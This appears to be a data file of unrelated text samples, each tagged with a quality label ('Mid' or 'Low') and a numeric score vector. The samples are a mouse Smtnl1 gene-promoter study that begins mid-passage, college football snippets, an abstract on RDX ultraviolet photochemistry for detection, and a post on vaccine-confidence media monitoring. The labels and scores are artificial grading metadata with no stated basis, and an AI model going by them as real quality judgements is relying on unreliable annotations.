different tissues with qPCR techniques. {#F1} We also investigated the expression of mRNA encoding SMTNL1 transcripts in various human tissues with Northern blot analysis. For this study, we used a 1.0-kb 5\'-probe based on mouse *Smtnl1*and moderate stringency washes. The probe was generated to include the sequence encoding the N-terminal 273 amino acid residues of SMTNL1 in order to avoid cross-reactivity with other transcripts that possess sequence encoding a calponin homology (CH)-domain, such as the smoothelins. A single transcript of \~2.1-kb was detected in skeletal muscle (Figure [1B](#F1){ref-type="fig"}) and correlated with the predicted mRNA size of 1.8-kb. No other mRNA species were identified, implying that a single *Smtnl1*transcript exists in skeletal muscle. Although we obtained a strong signal for *Smtnl1*mRNA in skeletal muscle, northern signals were not detected in tissues with high vascular content such as brain and kidney or in tissues with high smooth muscle content (e.g., placenta, small intestine or colon). As seen from our nested-PCR results, a number of smooth muscle tissues do possess *Smtnl1*mRNA, but at much lower levels than skeletal muscle which might account for the inability to detect expression by Northern blotting. These data agree with protein distributions as determined previously by Western blotting \[[@B3]\]. Interestingly, recent studies have revealed that exercise- and pregnancy-induced alterations in SMTNL1 expression were linked to functional adaptations in skeletal and smooth muscle contractile performances. Given these previous findings, it will be important to generate an accurate tool to quantitatively analyze *Smtnl1*transcript levels in human tissues and/or mouse models of disease. Smtnl1 transcription start site mapping --------------------------------------- The murine *Smtnl1*gene \[GenBank: [68678](68678)\] is located on chromosome 2, E1 and spans 11.48-kb with 8 exons. The mRNA sequence \[GenBank: [NM_024230](NM_024230)\] has been annotated using bioinformatic and curatorial analyses in the NCBI Refseq database. A thymidine residue at -162 bp from the translational start site (AUG) within the *Smtnl1*mRNA was assigned as the provisional transcriptional start site (TSS). This positions the ATG at the start of exon 2 while exon 1 (162 nt) is not translated. To verify the location of the TSS in the *Smtnl1*gene, we performed 5\'-RACE experiments on murine smooth and skeletal total RNA. Three reverse, gene-specific primers were designed for the PCR step that follows cDNA synthesis in the 5\'-RACE process (see Table [1](#T1){ref-type="table"}). Primer GSP3 and GSP 2 anneal just downstream of the TSS and upstream of the AUG (expected PCR product 63 bp and 176 bp, respectively). Primer GSP1 anneals just upstream and outside of the CH domain in exon 8 (expected PCR product 1479 bp). ###### PCR primers used in the analysis of *Smtnl1*. ----------------------------------------------------------------------------- RT-PCR & nested PCR -------------------------- -------------------------------------------------- mSmtnl1-F1 AAGAAGGATCGAGCACCAGAAC mSmtnl1-R1 ACACACTTGGAATCGGGCAC mSmtnl1-nested-F1 GGAAGGCCATCATGGACAAATTT mSmtnl1-nested-R1 GCACAGTCGGCTAGTTTCTCTG **5\'-RACE** 5\'-CDS dT~25~VN (N = A, C, G, or T; V = A, G, or C) SMART II A AAGCAGTGGTATCAACGCAGAGTACGCGGG UPM 5:1 mixture of (1): (2)\ (1) CTAATACGACTCACTATAGCAAGCAGTGGTATCAACGCAGAGT\ (2) CTAATACGACTCACTATAGC NUPM AAGCAGTGGTATCAACGCAGAGT GSP1 CCACCTCCAGCAGCTGGGCACAGTCGGCTAG GSP2 GCCTCGTTCTAGCCGAGCTGCCTCACTCTCCAT GSP3 CACCCCACCTTCAAGAGGCCCGGGCTTCG NGSP1 CACCCCACCTTCAAGAGGC NGSP2 CCAACTCCTTTGTGTCACTTCCG **RPA** RPA2 TAATACGACTCACTATAGGGCTGATCAGATGCTAGGTACACTT\ GCTTCCACCACCCCTTGCTTCCACC T7 promoter TAATACGACTCACTATAGGG RPA-NCS GAGAGGGACGCAGCAGCGTG RPA-NCA GGTTCTGCCTGCAGCTCGG RPA-M1-2S TAGAACGAGGCAAGAGCTCC RPA-M1-2A GTTCTGCCCAATCTGAAGGC RPA-FR1 GCCACCTGTCAGATCTTCGG RPA-RT7 TAATACGACTCACTATAGGGCTGATCAGATGCTAGGTACAG\ TTCTGCCCAATCTGAAG **Promoter Truncations** +100 bp LUC R1 GTGGGATCCGTGAAAGGTAAGAATAGG 0 bp LUC F1 CTAGCCTTCTAGAACGAGGCAAGAGCTCC -118 bp LUC F2 CTAGAATTCCTTCCCGAAGCCCGGGC -218 bp LUC F3 CTCGAATTCGCAGCGTGATTGAAAGATG -468 bp LUC F4 CTAGAATTCCCCCTCAGCAGCTACTTTG -767 bp LUC F5 CTCGAATTCCGTTGGGAACTGGGAATTCCG -1350 bp LUC F6 CTAGAATTCGACAAAGCTTGGGGTCTATATC -1637 bp LUC F7 CTAGAATTCCTCTTAACCTCCAAGACATC -1869 bp LUC F8 CTAGAATTCCTCTTAACCTCCAAGACATC -2368 bp LUC F9 CTAGAATTCCAAAGTCCTATTGCTTGCACC -2759 bp LUC F10 GCTGAATTCGAATTATCTCATGGACTTGCCTAGAG ----------------------------------------------------------------------------- The 5\'-RACE PCR on smooth muscle (Figure [2A](#F2){ref-type="fig"}) and skeletal muscle (Figure [2B](#F2){ref-type="fig"}) total RNA produced low (\< 250 bp) molecular weight cross-dimer products between the GSP and 5\'-RACE UPM primers (as verified by sequencing). When skeletal muscle mRNA was used as template together with primer GSP1, a faint band was visible at approximately 1.5-kb that was close to the expected product size (Figure [2B](#F2){ref-type="fig"}). To increase specificity and sensitivity, a second round of PCR was performed using nested primers on the products from the 5\'-RACE PCR. The expected amplicon sizes with the NCBI-predicted TSS were 63 bp for NGSP1 and 823 bp for NGSP2. A strong band of approximately 700 bp was observed for nested PCR reactions completed on both smooth and skeletal muscle GSP1 PCR products (Figure [2A](#F2){ref-type="fig"} &[2B](#F2){ref-type="fig"}), somewhat smaller than the expected 823 bp product for the NGSP2 primer. Sequence analysis revealed a partial alignment of the 823 bp NGSP2 product with *Smtnl1*, starting within exon 1. {#F2} The 5\' end of the product was 119 bp shorter than expected from the NCBI-predicted TSS. To further validate the TSS identified with 5\'-RACE, ribonuclease protection assays (RPA) were performed. A ssRNA riboprobe (511 nt) was generated to span both the NCBI-predicted and 5\'-RACE-derived TSS. A protected fragment of 369 bp was expected for the NCBI-predicted TSS whereas a 231 bp fragment was expected for the newly derived TSS. As shown in Figure [2C](#F2){ref-type="fig"}, RPA was completed with smooth and skeletal muscle mRNA and biotin-18-UTP-labeled riboprobe. As expected, the full-length probe was detected near the 500 bp marker. A protected fragment slightly larger than 200 bp was detected in the RPA with the addition of skeletal muscle mRNA. This result further confirms the TSS location to be different from that annotated in the NCBI database, occurring less than 50 nt upstream of the translational start codon. No protected fragment was detected when yeast RNA (control) or smooth muscle RNA was used in the RPA. The latter result was likely due to lack of sensitivity of the RPA conditions for low abundance mRNAs. Analysis of the sequence located upstream of the start codon (ATG) in murine *Smtnl1*indicated the presence of an initiator (Inr) sequence and a TATA box (Figure [2D](#F2){ref-type="fig"}). Therefore, our experimentally mapped *Smtnl1*TSS corresponded to a thymidine within the Inr sequence (CTAGAAC, where the T was the first transcribed nucleotide) and was located 44 nt upstream of the translational start codon. The putative TATA box sequence was identified at -23 to -31 nt upstream of the new TSS. Further sequence analysis showed that the Inr and TATA sequences of *Smtnl1*are conserved within a variety of mammalian *Smtnl1*genes. The expression profile of *Smtnl1*differs from the other smoothelin (Smtn) family members that are exclusively expressed in differentiated smooth muscle cells. The *Smtnl1*promoter was expected to be different since the smoothelins are not expressed in any tissue but smooth muscle cells. Indeed, the promoter sequences of smoothelins and *Smtnl1*do not bear any resemblance to each other, despite some similarities in the protein-coding region (mainly within the C-terminal calponin homology domain). The SMTN-A and SMTN-B isoforms of the *Smtn*gene are generated by alternative transcriptional start sites \[[@B11]\] that provide selective expression of each isoform in visceral and vascular smooth muscle beds, respectively. Moreover, alternative splicing produces three different C-terminal variants of each SMTN isoform \[[@B15]\]. It is unlikely that multiple SMTNL1 isoforms exist since a single *Smtnl1*TSS was identified from both skeletal and intestinal smooth muscle total RNA with sequencing of several 5\'-RACE clones. All sequences commenced at a thymine located 44 nt upstream of the translational start site (ATG). However, we have not yet completed 5\'-RACE on *Smtnl1*transcripts isolated from vascular tissue. Furthermore, we cannot exclude the presence of multiple C-terminal splice variants since we did not complete 3\'-RACE analysis. SMTNL1 promoter reporter assay ------------------------------ To locate *cis*-elements in the core promoter region that modulate expression of *Smtnl1*, we constructed deletion mutants of the *Smtnl1*upstream sequence and monitored *Gaussia*luciferase reporter activities in rat aortic A7r5 smooth muscle cells. Promoter sequences were generated spanning up to 2.7-kb upstream of the newly derived *Smtnl1*TSS and cloned into a promoterless pGLuc luciferase vector. Figure [3A](#F3){ref-type="fig"} shows the relative luciferase activity using progressively shorter promoter constructs. A 3.5-fold induction was observed for the upstream region spanning +100 to -2759. Deletion of the region from -1637 to -1869 increased the luciferase induction to 8.5-fold while removal of the sequence from -468 to -1637 elicited no further effect. The minimal sequence establishing the proximal promoter (0 to -118) provided a 7-fold luciferase induction. Finally, the first 100 bases downstream of the new TSS had no activity. These data reveal two regions of promoter sequence that functioned as enhancer elements, -218 to -468 and 0 to -118. Furthermore, two inhibitory elements were also defined, -1637 to -1869 and -118 to -218. These results demonstrate that the first 118 bp upstream of the *Smtnl1*TSS could significantly enhance luciferase production, suggesting that the core promoter was located in this region. Importantly, the region of the core promoter did not include the TSS previously annotated in NCBI. Our data confirms that the region immediately upstream of the NCBI-annotated TSS could not enhance expression, which further verifies our newly identified TSS downstream of the NCBI-annotated TSS. We further investigated the sequence of the first 118 bp upstream of the TSS for possible promoter elements. A TTAAA motif, 31 nt upstream of the TSS, was 100% conserved amongst all the mammalian *Smtnl1*promoters investigated and is predicted to serve as a TATA-box. We were unable to identify a CAAT element. {#F3} The promoter region just upstream and including the TSS is highly conserved in mammals, emphasizing its importance. The TSS of some mammals is not annotated in this region, and this might be due to difficulties in identifying 5\'-UTRs within the corresponding ESTs. Further corroborating this possibility was the distance between the TSS (equivalent to murine exon 1) and the translational start-site (ATG) in murine exon 2. In all mammals, this distance was similarly expansive (e.g., 3400 bp (dog) to 5200 bp (cow)). We propose that all mammals investigated have a TSS located downstream of the conserved region, similar to the murine promoter. This would add an additional 5\'-UTR exon 1 to human, rat and horse *Smtnl1*. We also investigated whether the pattern of luciferase inductions observed with the *Smtnl1*promoter sequences resulted from a specific set of transcription factors unique to A7r5 smooth muscle cells. For this, the activities of three *Smtnl1*promoter constructs were also assessed in HEK 293 (human embryonic kidney) and Rat-1 (rat fibroblast) cell lines (Figure [3B](#F3){ref-type="fig"}). The same pattern of luciferase induction was seen in these cell lines; however, the maximal activation measured was only 3-fold, a significant reduction when compared to the maximal activity found in A7r5 smooth muscle cells. The identified *cis*-acting promoter spanned at least 1869 bp and could up- or down-regulate expression in A7r5, Rat-1 and HEK 293 cells, depending on which region was present. However, the much higher maximum activation in smooth muscle cells compared to fibroblast and kidney cells suggests restrictive control of *Smtnl1*expression in non-muscle cells and emphasizes the importance of SMTNL1 expression in muscle contractile function. In silico analysis of putative transcription factor binding sites within Smtnl1 ------------------------------------------------------------------------------- A comparison of TSS sites in various mammalian *Smtnl1*genes was undertaken, and BLAST searches revealed that exon 1 is not translated and the murine ATG start codon is located at the beginning of exon 2. In the case of some mammals (i.e., human, rat and horse), the *Smtnl1*gene starts with the ATG in exon 1 and is analogous to murine exon 2. Further investigation of these *Smtnl1*variants revealed the location of a genomic region that has not been annotated. This region lays several thousand bases upstream with high similarity to the murine exon 1. Comparison of various mammalian SMTNL1 protein sequences revealed the highest conservation at the N- and C-termini (aa 1 - 17 as well as aa 209 - 459). Thus, it is not surprising that, based on protein sequence and gene sequence alignment, the exon including the start codon was annotated in all mammals while the upstream exon 1 was sometimes not annotated. In agreement with the observation that exon 1 is often located far upstream of exon 2, there is approximately 3000 to 4000 bp separating the conserved region corresponding to the mouse 5\'-UTR and the ATG start codon of *Smtnl1*from various mammalian species (Figure [4A](#F4){ref-type="fig"}). Based on these findings, it is reasonable to predict that the human *Smtnl1*TSS lies upstream of the region homolog to murine *smtnl1*exon 1, even though it remains to be annotated. Indeed, the region just upstream of the murine TSS is highly conserved in mammals, with \> 75% percent identity (Figure [4A](#F4){ref-type="fig"}). {#F4} The highest conservation in the murine *Smtnl1*5\'-UTR sequence was located between -80 bp and -220 bp relative to the newly derived TSS, suggesting functional importance. Indeed, the region corresponds in part to the strongly activating construct determined with the luciferase reporter assay (i.e., +100 to -118). We searched for transcription factor binding sites (TFBS) in this region using the PATCH program that utilizes the TRANSFAC^®^database of *cis*-acting transcription factors \[[@B16],[@B17]\]. Possible mammalian TFBSs in this region include AP2α, SF-1, RXRα, SP1, ER and c-myc amongst others (Figure [4B](#F4){ref-type="fig"}). Intriguingly, this region of the *Smtnl1*promoter also possesses a putative TFBS for MyoD (myogenic differentiation-1), a transcriptional activator of muscle-specific genes \[[@B18]\], located 190 bp upstream of the TSS. MyoD shows highest transcriptional activation when dimerized with another MyoD or other family members (e.g., Sp1, Mef2 and Pbx) \[[@B19],[@B20]\]. Indeed, possible non-canonical sites for MyoD as well as Sp1 are located adjacent to the primary MyoD site in the *Smtnl1*promoter. Thus, regulation of *Smtnl1*expression via MyoD would explain the robust expression found in skeletal muscle when compared to other tissues. We completed EMSAs with nuclear extracts from mouse skeletal muscle and DNA probes derived from the MyoD site in the *Smtnl1*promoter (Figure [5A](#F5){ref-type="fig"}). Gel shifts were suggestive of protein binding to the *Smtnl1*MyoD sequence and could be inhibited with addition of excess unlabelled probe as a competitive inhibitor. Moreover, EMSAs completed in the presence of MyoD antibody exhibited a defined \"supershifting\" band. ![**EMSAs of the putative MyoD-binding and mirror repeat sequence in the murine *Smtnl1*promoter**. \[γ-^32^P\]-labeled oligonucleotide probes (3 pmol) were incubated with nuclear extracts isolated from murine skeletal muscle (for MyoD, in **A**) or A7r5 and HEK293 cells (for mirror repeat sequence (MRS), in **B**). In some experiments, 200-fold excess unlabeled competitors were added prior to incubation with ^32^P-labeled probes. For supershift analysis, anti-MyoD antibody (1 μg) was introduced with nuclear extracts following the addition of labeled probe. Results are representative of n = 3 independent experiments.](1471-2199-12-10-5){#F5} The highest density of putative TFBSs lay within the sequence GAAGGTGGGGTGGGGTGGAAG of *Smtnl1*that forms a 20 bp mirror-repeat sequence (MRS). Mirror repeats are commonly associated with the formation of an intramolecular triple-helical conformation termed H-DNA \[[@B21],[@B22]\]. Many promoters, especially those integral to genes involved in growth regulation, have H-DNA forming mirror repeats. The *Smtnl1*MRS lies within a region of high transcriptional activation as determined by luciferase reporter assay, and it is possible that this region is of paramount importance for *Smtnl1*expression. EMSAs completed with MRS oligonucleotide probes and nuclear extracts from A7r5 cells demonstrated a single intense band (Figure [5B](#F5){ref-type="fig"}). This binding pattern was significantly altered when nuclear extracts from HEK293 cells were used; in this case, multiple bands were observed. The results are suggestive of transcription factor binding to the MRS; however, more in depth investigation will be required to identify the specific proteins involved. Other transcription factors are of interest based on their function and our knowledge of SMTNL1. Putative binding sites for the nuclear hormone receptor steroidogenic factor-1 (SF-1) as well as estrogen receptor (ER) are present. These receptors might be responsible for the observed differences in *Smtnl1*expression during sexual development in males \[[@B3]\] as well as during pregnancy in females \[[@B4]\]. RXRα (retinoid × receptor alpha) modulates the actions of other hormone receptors and plays a role in myogenesis. RXRα is also responsible for the activation of MyoD and deficiency in RXRα causes defects in skeletal muscle development \[[@B23]\]. Furthermore, RXRα is a binding partner for PPAR (peroxisome proliferator-activated receptor) transcription factors \[[@B24]\]. In turn, PPARγ regulates endurance-exercise induced fiber type remodeling \[[@B25]\]. Since endurance-exercise caused up-regulation of *Smtnl1*, RXRα together with PPARγ might be the responsible factors. Notable is the absence of a consensus CC-A/T rich-GG (CArG) box, the binding site for serum response factor (SRF) that is present in smooth muscle restricted genes \[[@B26],[@B27]\]. This distinguishes *Smtnl1*from the related *Smtn*genes and is further manifested by the expression of Smtnl1 in skeletal muscle \[[@B3]\]. Of the numerous transcription factors predicted to bind to the proximal promoter, several could be responsible for the adaptive expression of *Smtnl1*after endurance-exercise, pregnancy and sexual development in smooth and skeletal muscle. This will be subject to further research. Conclusions =========== In the present study, we identified *Smtnl1*expression in all types of smooth muscle tissue (e.g., phasic and tonic; vascular and visceral) examined, albeit at lower levels than found in skeletal muscle. Current evidence supports a key role for SMTNL1 in adaptive responses to physiological stresses (e.g., pregnancy, exercise and sepsis). Therefore, defining key elements of the murine *Smtnl1*gene will enable better understanding of mechanisms for smooth and skeletal muscle contractile plasticity in response to physiological stresses. Methods ======= RNA samples and cell culture ---------------------------- Mouse total skeletal muscle RNA and mouse total smooth muscle RNA (from small intestine) were purchased from Clontech Laboratories (Mountain View, CA). Rat aortic smooth muscle (A7r5, \[ATCC:CRL-1444\]), human embryonic kidney (HEK 293, \[ATCC:CRL-1573\]) and rodent fibroblast (Rat 1, \[ATCC:CRL-2210\]) cells were maintained in Dulbecco\'s Modified Eagle Medium (DMEM) supplemented with 10% fetal bovine serum (FBS) in a humidified tissue culture incubator at 37°C with 5% CO~2~. DMEM and FBS were purchased from Invitrogen (Carlsbad, CA). Reverse transcription Polymerase Chain Reaction (RT-PCR) -------------------------------------------------------- For all RT-PCR reactions, the \'standard PCR\' kit from Fermentas (Glen Burnie, MD) was used. All reactions were carried out using a thermal cycler (Eppendorf Mastercycler; Westbury, NY). Skeletal muscle as well as aorta, ileum and colonic smooth muscle tissues were removed from male mice (C57Bl/6) that had been anesthesized and euthanized according to protocols approved by the University of Calgary Animal Care and Use Committee. Total RNA and mRNA were extracted using the RNeasy Mini kit (Qiagen) or Ambion Micro Poly(A) Pure extraction kit, respectively. First strand cDNA was synthesized using the Sensiscript RT kit (Qiagen). For the PCR amplification, Phusion Taq DNA polymerase (New England Biolabs) was used with the gene-specific primers mSmtnl1-F1, mSmtnl1-R1, mSmtnl1-nested-F1 and mSmtnl1-nested-R1. The primer sequences are noted in Supplementary Table [1](#T1){ref-type="table"}. Primers were selected to be unique to *Smtnl1*mRNA and did not occur within the transcripts of the other smoothelin family members. The nested-RT-PCR reactions were used because they offer increased specificity and sensitivity. RT-PCR reactions for GAPDH were performed on all RNA samples to verify the integrity of the RNA. Northern Blot ------------- Mouse *Smtnl1*cDNA (1 - 1038 bp) was radiolabeled with \[α^32^P\]-dCTP by the random-priming method using a PrimeIt II Random Primer Labeling kit (Stratagene). Unincorporated nucleotide was removed with a NucAway Spin Column (Ambion). A multiple tissue Northern blot that contained poly(A)+ RNA from a variety of human tissues was purchased from Clontech. The poly(A)+ RNA membrane was prehybridized in ExpressHyb solution for 30 min at 68°C. Radiolabeled cDNA probe (\~5 × 10^6^cpm/mL) was denatured at 100°C for 2 min then rapidly chilled on ice. The membrane was incubated with the radiolabeled probe in 5 mL of fresh ExpressHyb with continuous shaking for 1 h at 68°C. Following hybridization, the blot was washed for 30 min at 23°C with 2× SSC (300 mM NaCl, 30 mM Na citrate, pH 7.0), 0.5% SDS (several washes) and twice for 20 min with 0.1× SSC (15 mM NaCl, 1.5 mM Na citrate, pH 7.0), 0.1% SDS at 50°C. The membrane was then subjected to autoradiography. Rapid Amplification of 5\' cDNA ends (5\'-RACE) ----------------------------------------------- The SMART RACE cDNA Amplification kit from Clontech Laboratories was used to amplify 5\'-cDNA ends of mouse smooth and skeletal muscle mRNA. First strand cDNA synthesis was carried out according to the manufacturer\'s instructions with mouse total RNAs (Clonetech, 1 μg) from intestinal smooth muscle or skeletal muscle, 5\' CDS primer A, SMART II A oligonucleotide and TITANIUM *Taq*DNA polymerase (Advantage 2 PCR System, Clontech). The 5\'-RACE PCR reaction was performed according to the manufacturer\'s protocol using Universal Primer A mix (UPM, forward primer) and one of three *Smtnl1*gene specific primers (GSP1-3; reverse primers). The procedure incorporates an additional 50 bp to the 5\'-end of the PCR product. To verify the RACE products, nested 5\'-RACE PCR was carried out using nested UPM (NUPM) forward primer and one of three nested *Smtnl1*gene specific reverse primers (NGSP1, NGSP2). The nested RACE products were separated on a 1% agarose gel, extracted and cloned into the TOPO-TA vector (Invitrogen, Carlsbad, CA). All nested RACE products were sequenced at the University of Calgary DNA core service. Ribonuclease protection assay (RPA) ----------------------------------- To verify the translation start site (TSS), RPA was performed on murine smooth and skeletal muscle mRNA. The template for the riboprobe was a chimera of murine genomic DNA, comprising the 5\'-UTR and exon 1 of the *Smtnl1*gene (-52 nt to + 160 nt relative to the NCBI-predicted TSS \[Gene ID: 68678\]) plus the 5\'-end of exon 2 taken from *Smtnl1*(+161 nt to +319 nt \[GenBank: [NM_024230.1](NM_024230.1)\]) and a T7 primer overhang. The template was generated using standard PCR methods: the BAC clone RP23-125A8 (Children\'s Hospital Oakland Research Institute, Oakland, CA) and primers RPA-NCS and RPA-NCA were used for the genomic portion, and the product of the 5\'-RACE together with primers RPA-M1-2 S and RPA-M1-2A was used as the mRNA part. A second PCR with primers RPA-FR1 and RPA-RT7 engineered the T7 promoter into the RPA-template. The riboprobe was synthesized using T7 DNA dependent RNA transcriptase (New England Biolabs, Ipswich, MA) according to the manufacturer\'s instructions. To label the riboprobe, biotin-18-UTP/UTP (1:5 ratio) was used in the reaction mix (Invitrogen). For the RPA, the RPA III kit (Ambion, Austin, TX) was used with 10 μg mRNA and 100 pg riboprobe. Briefly, murine mRNA and the riboprobe were hybridized to form dsRNA (40.5°C, overnight). Then, any remaining single-stranded mRNA and riboprobe were digested with RNase. The protected RNA was resolved by denaturing PAGE and transferred to a SensiBlot nylon membrane (Fermentas, Glen Burnie, MD). The remaining biotin-18-UTP-labeled riboprobe was detected using Ambion\'s Brightstar Biodetect kit according to the manufacturer\'s instructions. Luciferase Assay ---------------- A luciferase reporter assay was used to investigate the putative *Smtnl1*promoter sites in the 5\'-flanking region. The *Smtnl1*gene and 5\'-flanking sequence spanning bp 84662089 to bp 84651332 of mouse chromosome 2 was obtained from BAC clone RP23-125A8. Different lengths of *Smtnl1*5\'-flanking DNA were generated by PCR with the BAC plasmid as template and cloned into the pGLuc-Basic vector (New England Biolabs, Ipswich, MA). The antisense primer utilized for all constructs engineered a BamHI site at +100 bp downstream of the transcription start site identified by our previous 5\'-RACE/RPA analysis. Ten different sense primers were used, adding an EcoRI site for cloning into the pGLuc-Basic vector. All clones were verified by DNA sequencing. Using Metafectene-Pro (Biontex Laboratories, München, Germany) and following the manufacturer\'s protocols, we transiently transfected A7r5, HEK 293 or Rat-1 cells with pGLuc-Basic vectors (5 μg) containing the various *Smtnl1*promoter constructs and pbActb-gal vector (1 μg). The pbActb-gal vector expresses β-galactosidase under the constitutively active β-actin promoter and was a kind gift from Dr. J. Cross (University of Calgary). Twenty-four hours before transfection, cells were plated in 30-mm dishes to produce a density of \~80% confluence. At 48 hours post-transfection, the media was assayed for luciferase activity using the Gaussian Luciferase Assay kit (New England Biolabs) and cell lysates were assayed for β-galactosidase activity, in quadruplicate samples of three independent experiments. To account for differences in transfection efficiency, the luciferase activity was normalized to β-galactosidase activity and expressed as % change relative to the activity of empty pGLuc-Basic vector (defined as 100%). As a positive control, pGLuc-CMV was used in separate transfections. Electrophoretic mobility shift assay (EMSA) ------------------------------------------- DNA binding was assessed by EMSAs with standard procedures \[[@B28]\] using nuclear extracts prepared from A7r5 cells or mouse skeletal muscle tissue (hind-limb). Double-stranded oligonucleotide probes containing the mirror-repeat (MRS) and putative MyoD binding sequences located within the *Smtnl1*promoter region were synthesized (sense strands: MRS: 5\'-GAAGGTGGGGTGGGGTGGAAG-3\'; MyoD: 5\'-ATTGAAAGATGCCACCTGTCAGATCT-3\'). Each oligonucleotide was annealed to its complementary strand, end-labeled with \[γ-^32^P\]-ATP using T4 polynucleotide kinase and then purified with G-25 Sepharose mini-columns. Binding reactions were carried out in a mixture containing 1-15 μg nuclear extract proteins in 20 μL of binding buffer (10 mM Tris, 50 mM KCl, 1 mM DTT, 5% glycerol, pH 7.5). Radiolabeled, double-stranded oligonucleotide probe (3 pmol) was added, and mixtures were incubated at room temperature for 30 min prior to resolution on 5% non-denaturing polyacrylamide gels (1× TBE). The gels were then dried, and the radioactive bands were developed using a Storm phosphoimager (GE Healthcare). For competition experiments, unlabeled MyoD or MRS oligonucleotide competitor (200-fold excess) was added to the reaction mixture before incubation with the radiolabeled probe. For MyoD supershift assays, the reaction mixtures were incubated with 1 μg of anti-MyoD antibody prior to the addition of radiolabeled probe. Bioinformatic promoter analysis ------------------------------- The 5\'-UTR of the murine *Smtnl1*was searched against mammalian genomes using the BLAST algorithm. Regions with high alignment score (expectancy value E \< 10^-10^) were aligned using CLUSTALX and GeneDoc after visual inspection. All mammalian sequences aligning to the murine gene (i.e., bp 25704307 to 25703966 of the reverse strand of GenBank: [NT-039297.7](NT-039297.7); 197 bp upstream of the TSS defined by NCBI) were selected for further investigation. The sequence identity was approximately 54%. The region between +38 to -94 relative to the NCBI TSS (-79 to -211 of the newly defined TSS) was termed highly conserved with an identity of \>72% between all sequences. This region of highly conserved sequence was analyzed with the PATCH program for putative transcription factor binding sites based on the Transfac^®^database \[[@B16],[@B17]\]. List of Abbreviations ===================== bp: base pair; cGMP: cyclic-guanidine monophosphate; DMEM: Dulbecco\'s Modified Eagle Medium; EMSA: electrophoretic mobility shift assay; FBS: fetal bovine serum; MRS: mirror repeat sequence; MyoD: myogenic differentiation-1; nt: nucleotide; PKA: protein kinase A; PKG: protein kinase G; 5\'-RACE: rapid amplification of 5\' cDNA ends; 3\'-RACE: rapid amplification of 3\' ends; RPA: ribonuclease protection assay; SMTN: smoothelin; SMTNL1: smoothelin-like 1; SRF: serum response factor; TFBS: transcription factor binding site; TSS: transcriptional start site; 5\'-UTR: 5\' untranslated region. Authors\' contributions ======================= AU-L carried out MyoD EMSAs and bioinformatic work, interpreted the data and drafted the manuscript. ST performed RT-PCR for Smtnl1 in mouse tissues. SM carried out 5\' RACE, RPA and luciferase assay analyses. RW contributed to the design of 5\'-RACE, RPA and nested RT-PCR experiments as well as the interpretation of the data. MB performed the northern blot. JM conceived and designed the study, interpreted the data and revised the manuscript for intellectual content. All authors read and approved the final manuscript. Acknowledgements ================ This work was supported by research grants from the Canadian Institutes of Health Research (CIHR, MOP-72720) and the Heart and Stroke Foundation of Canada (HSFC). MB was recipient of a HSFC fellowship, and ST was recipient of an Alberta Innovates - Health Solutions (AIHS) Studentship. JM holds an AIHS Senior Scholar Award and Canada Research Chair in Smooth Muscle Pathophysiology. | Mid | [
0.634961439588688,
30.875,
17.75
] |
Solution and Solid Hexahydro-1,3,5-trinitro-1,3,5-triazine (RDX) Ultraviolet (UV) 229 nm Photochemistry. We measured the 229 nm deep-ultraviolet resonance Raman (DUVRR) spectra of solution and solid-state hexahydro-1,3,5-trinitro-1,3,5-triazine (RDX). We also examined the photochemistry of RDX both in solution and solid states. RDX quickly photodegrades with a solution quantum yield of φ ~ 0.35 as measured by high-performance liquid chromatography (HPLC). New spectral features form over time during the photolysis of RDX, indicating photoproduct formation. The photoproduct(s) show stable DUVRR spectra at later irradiation times that allow standoff detection. In the solution-state photolysis, nitrate is a photoproduct that can be used as a signature for detection of RDX even after photolysis. We used high-performance liquid chromatography-high-resolution mass spectrometry (HPLC-HRMS) and gas chromatography mass spectrometry (GCMS) to determine some of the major solution-state photoproducts. X-ray photoelectron spectroscopy (XPS) was also used to determine photoproducts formed during solid-state RDX photolysis. | Mid | [
0.6282722513089001,
30,
17.75
] |
The injury that crippled Matt Jones’ attempt to establish himself as one of the elite running backs in the country last season will cause him to miss all of spring practice, coach Will Muschamp announced … Taylor, a true freshman from Glades Day School, arrived at Florida with enormous expectations and has earned the chance to fulfill them. The Gators likely will start him Saturday against Georgia (3:30 p.m., CBS).… [Updated: Oct 8. This story originally said Kelvin Taylor did not play against Arkansas. He was not listed on the official participation log, but it was confirmed later that he appeared late in the game.] How does Gators coach Will Muschamp get his players to stop tackling each other? The latest mishap involved RB Matt Jones’ potential 79-yard touchdown run being cut 12 yards short because WR Quinton Dunbar accidentally pulled him down while trying to get in position to block. “I don’t know,” Muschamp said after his team beat Kentucky 24-7 tonight. “It’s a good problem to have. It means we’re getting the ball. But … | Low | [
0.470954356846473,
28.375,
31.875
] |
Big Data: How We Communicate Vaccine Matters A study published in the Journal of Infectious Diseases found that the introduction of a vaccine to prevent cervical cancer in 2006 has reduced infections with HPV by more than half among girls and young women. Another recent study published online in PLOS ONE discovered vaccination prevented between 1.1 million and 5 million cases of the flu per season over a 6-year period from 2005 to 2011. As scientific evidence consistently proves vaccine’s significant contribution to public health, negative perceptions about vaccine still lead to fear and refusal of essential vaccination and resulting in outbreaks of preventative diseases across the globe. Last Sunday, two polio vaccine volunteers were killed by extremists in Pakistan, one of only three countries where polio remains endemic, with 58 cases reported in 2012, according to the Global Polio Eradication Initiative. And we all remember in 2011, Michele Bachmann, a republican presidential candidate claimed that the HPV vaccine can lead to mental retardation. These cases highlight the lack of understanding of vaccine is a challenge both developing and developed countries are facing. They also tell us scientific data alone cannot address the public’s concerns with vaccine as these concerns are often deeply rooted in culture, history and political systems. Effectively communicating information about vaccine and shifting the negative perception rely on a precise understanding of the socioeconomic landscape from region to region and targeted strategies that tackle unique challenges. In order to gain the understanding and insights, public health professionals and healthcare communicators need comprehensive data that capture trends on a global level as well as social, economic and political context for each region. A new study focused on measuring vaccine confidence using global data obtained by a media surveillance system provides valuable insights into how we can develop more effective communication strategy and tactics to enhance the public’s confidence in vaccine. A group researchers have used data collected from HealthMap, a monitoring system developed by Boston Children’s Hospital that use keywords to capture relevant mentions in 15 languages from both traditional and social media about public health events, to detect and characterize early signs of vaccine issues. The study, published online in Lancet Infectious Disease discovered that from May 2011 to April 2012, 7171 (69%) reports contained positive or neutral content and 3209 (31%) contained negative content. Of the negative reports, 1726 (21%) were associated with beliefs, awareness and perception. The researches note these data provide a growing body of evidence of the potential risks of the spread of unchecked rumors, and of failing to address legitimate questions and concerns. These findings have implications for both healthcare communicators and public health professionals. As digital and social media reshape the media landscape, real-time media surveillance data can detect early signs of concerns before they reach a large audience. Data can also help us understand how critical information travels from one stakeholder group to another and how it gets amplified. These insights are essential for public health strategy planing and program development. | Mid | [
0.645021645021645,
37.25,
20.5
] |
